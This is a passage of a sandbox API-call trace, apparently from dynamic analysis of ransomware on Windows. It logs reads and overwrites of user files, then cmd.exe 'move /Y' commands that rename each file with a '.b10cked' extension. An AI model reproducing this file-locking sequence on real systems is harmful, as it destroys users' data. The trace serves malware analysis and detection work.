lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.702] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.703] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.703] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.703] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.703] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.703] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.703] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0214.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN.url", cchWideChar=7, lpMultiByteStr=0x131add4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN.url", lpUsedDefaultChar=0x0) returned 7 [0214.707] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.707] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.707] CloseHandle (hObject=0x120) returned 1 [0214.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN 
Websites\\MSN.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url") returned 0x2a [0214.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.709] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xba4, dwThreadId=0xb34)) returned 1 [0214.924] CloseHandle (hObject=0x1b4) returned 1 [0214.924] CloseHandle (hObject=0x120) returned 1 [0214.924] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.924] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.924] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 
2 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.924] ReleaseMutex (hMutex=0xf8) returned 1 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.924] ReleaseMutex (hMutex=0xf8) returned 1 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.924] ReleaseMutex (hMutex=0xf8) returned 1 [0214.924] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.925] ReleaseMutex (hMutex=0xf8) returned 1 [0214.925] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27171419377) returned 1 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.925] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.926] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.927] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.927] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.928] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.928] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, 
lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.928] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.928] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.928] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.928] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSNBC News.url", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSNBC News.url", lpUsedDefaultChar=0x0) returned 14 [0214.933] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.933] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.934] CloseHandle (hObject=0x120) returned 1 [0214.934] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 
| out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL") returned 0x2f [0214.935] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.935] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBCN~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNBC News.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd40, dwThreadId=0xad4)) returned 1 [0214.937] CloseHandle (hObject=0x1b4) returned 1 [0214.937] CloseHandle (hObject=0x120) returned 1 [0214.937] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.937] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.937] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.937] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.937] ReleaseMutex (hMutex=0xf8) returned 1 [0214.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.937] ReleaseMutex (hMutex=0xf8) returned 1 [0214.937] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.937] ReleaseMutex (hMutex=0xf8) returned 1 [0214.938] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.938] ReleaseMutex (hMutex=0xf8) returned 1 [0214.938] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27172722448) returned 1 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x30400 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.938] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x30400 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.939] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2ff18 [0214.939] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x30400 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.959] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 